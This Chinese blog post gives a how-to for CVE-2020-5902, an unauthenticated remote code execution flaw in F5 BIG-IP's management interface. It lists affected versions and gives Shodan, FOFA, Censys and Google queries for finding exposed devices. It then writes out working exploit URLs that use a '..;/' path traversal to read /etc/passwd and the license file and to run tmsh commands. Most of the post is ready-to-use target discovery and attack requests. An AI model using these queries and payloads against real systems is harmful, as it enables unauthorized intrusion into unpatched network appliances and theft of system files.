介绍:

F5 BIG-IP 是美国F5公司一款集成流量管理、DNS、出入站规则、web应用防火墙、web网关、负载均衡等功能的应用交付平台。
在 F5 BIG-IP 产品的流量管理用户页面 (TMUI)/配置实用程序的特定页面中存在一处远程代码执行漏洞。
未授权的远程攻击者通过向该页面发送特制的请求包,可以造成任意Java 代码执行。进而控制 F5 BIG-IP 的全部功能,包括但不限于: 执行任意系统命令、开启/禁用服务、创建/删除服务器端文件等。

影响版本:

BIG-IP 15.x: 15.1.0/15.0.0
BIG-IP 14.x: 14.1.0 ~ 14.1.2
BIG-IP 13.x: 13.1.0 ~ 13.1.3
BIG-IP 12.x: 12.1.0 ~ 12.1.5
BIG-IP 11.x: 11.6.1 ~ 11.6.5

搜索语法:

shodan
http.favicon.hash:-335242539
http.title:"BIG-IP®- Redirect"
fofa
title="BIG-IP®- Redirect"
censys
443.https.get.body_sha256:5d78eb6fa93b995f9a39f90b6fb32f016e80dbcda8eb71a17994678692585ee5
443.https.get.title:"BIG-IP®- Redirect"
google
inurl:"tmui/login.jsp"
intitle:"BIG-IP" inurl:"tmui"

浏览器访问目标页面如下:
CVE-2020-5902 f5-big-ip Read File&RCE利用方式

可以使用的两种利用方法,Read File&RCE如下:

Read File

https://XXXXX/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/etc/passwd

CVE-2020-5902 f5-big-ip Read File&RCE利用方式

https://XXXXX/tmui/login.jsp/..;/tmui/locallb/workspace/fileRead.jsp?fileName=/config/bigip.license

CVE-2020-5902 f5-big-ip Read File&RCE利用方式

RCE

https://XXXXX/tmui/login.jsp/..;/tmui/locallb/workspace/tmshCmd.jsp?command=list+auth+user+admin

CVE-2020-5902 f5-big-ip Read File&RCE利用方式

好好学习,天天向上。

相关文章:

  • 2022-12-23
  • 2022-12-23
  • 2022-12-23
  • 2021-05-26
  • 2021-12-18
  • 2021-09-17
  • 2021-09-29
  • 2021-05-26
猜你喜欢
  • 2021-12-07
  • 2021-10-31
  • 2022-01-10
  • 2021-08-27
  • 2021-06-07
  • 2021-08-30
相关资源
相似解决方案